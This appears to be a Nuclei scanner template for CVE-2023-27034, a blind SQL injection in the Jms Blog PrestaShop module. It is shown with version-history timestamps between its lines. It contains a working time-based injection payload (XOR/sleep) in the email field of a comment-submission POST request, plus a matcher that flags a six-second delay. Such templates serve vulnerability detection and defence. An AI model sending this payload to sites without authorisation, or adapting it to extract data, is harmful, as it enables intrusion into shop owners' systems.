2023-08-18 23:19:47 +00:00
id : CVE-2023-27034
2023-08-31 11:46:18 +00:00
2023-08-18 23:19:47 +00:00
info :
name : Blind SQL injection vulnerability in Jms Blog
author : MaStErChO
severity : critical
description : |
2023-08-25 13:17:54 +00:00
The module Jms Blog (jmsblog) from Joommasters contains a Blind SQL injection vulnerability. This module is for the PrestaShop e-commerce platform and mainly provided with joommasters PrestaShop themes
2023-08-18 23:19:47 +00:00
reference :
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
- https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
- https://github.com/advisories/GHSA-7jr7-v6gv-m656
2023-08-31 11:46:18 +00:00
- https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html
2023-08-18 23:19:47 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-27034
cwe-id : CWE-89
2023-08-31 11:46:18 +00:00
epss-score : 0.00572
cpe : cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:*
epss-percentile : 0.75071
2023-08-18 23:19:47 +00:00
metadata :
2023-08-25 14:08:39 +00:00
max-request : 2
2023-08-31 11:46:18 +00:00
framework : prestashop
vendor : joommasters
product : jms_blog
tags : cve,cve2023,prestashop,prestashop-module,sqli,intrusive
2023-08-18 23:19:47 +00:00
http :
- raw :
- |
2023-08-25 13:17:54 +00:00
@timeout : 12s
POST /module/jmsblog/index.php?action=submitComment&controller=post&fc=module&module=jmsblog&post_id=1 HTTP/1.1
2023-08-18 23:19:47 +00:00
Content-Type : multipart/form-data; boundary=----------YWJkMTQzNDcw
X-Requested-With : XMLHttpRequest
2023-08-25 13:17:54 +00:00
Referer : {{RootURL}}
2023-08-18 23:19:47 +00:00
Host : {{Hostname}}
Connection : Keep-alive
2023-08-25 12:34:57 +00:00
2023-08-18 23:19:47 +00:00
------------YWJkMTQzNDcw
Content-Disposition : form-data; name="comment"
555
------------YWJkMTQzNDcw
Content-Disposition : form-data; name="customer_name"
------------YWJkMTQzNDcw
Content-Disposition : form-data; name="email"
0 'XOR(if(now()=sysdate(),sleep(6),0))XOR' Z
------------YWJkMTQzNDcw
Content-Disposition : form-data; name="post_id"
2023-08-25 13:17:54 +00:00
1
2023-08-18 23:19:47 +00:00
------------YWJkMTQzNDcw
Content-Disposition : form-data; name="post_id_comment_reply"
1
------------YWJkMTQzNDcw
Content-Disposition : form-data; name="submitComment"
submitComment=
------------YWJkMTQzNDcw--
2023-08-25 13:17:54 +00:00
- |
GET /modules/jmsblog/config.xml HTTP/1.1
Host : {{Hostname}}
2023-08-25 13:25:02 +00:00
2023-08-25 14:00:49 +00:00
stop-at-first-match : true
2023-08-31 11:46:18 +00:00
2023-08-18 23:19:47 +00:00
matchers-condition : and
matchers :
- type : dsl
dsl :
2023-08-25 14:00:49 +00:00
- 'duration_1>=6'
- 'contains(body_2, "Jms Blog")'
condition : and